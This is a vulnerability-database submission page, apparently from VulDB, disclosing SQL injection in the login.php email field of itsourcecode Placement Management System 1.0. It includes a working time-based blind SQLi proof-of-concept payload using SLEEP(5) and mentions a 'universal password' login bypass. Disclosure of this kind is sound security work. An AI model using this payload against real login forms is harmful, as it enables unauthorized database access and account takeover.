Invia #383859: itsourcecode Placement Management System 1.0 SQLiinformazioni

Titoloitsourcecode Placement Management System 1.0 SQLi
DescrizioneIn the login.php file, the email field is not properly sanitized, which may lead to SQL injection vulnerabilities. Additionally, as long as there is any data in the users table of the database, it is possible to log in using a universal password. ————————Poc———————————— Parameter: email (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: [email protected]#' AND (SELECT 3451 FROM (SELECT(SLEEP(5)))zIEe) AND 'NilV'='NilV&pass=123
Fonte⚠️ https://github.com/DeepMountains/Mirage/blob/main/CVE11-1.md
Utente
 Dee.Mirage (UID 71702)
Sottomissione31/07/2024 16:15 (2 anni fa)
Moderazione03/08/2024 08:49 (3 days later)
StatoAccettato
Voce VulDB273540 [itsourcecode Placement Management System 1.0 login.php email iniezione SQL]
Punti20

PrecedenteVisione D'ensembleIl prossimo

Interested in the pricing of exploits?

See the underground prices here!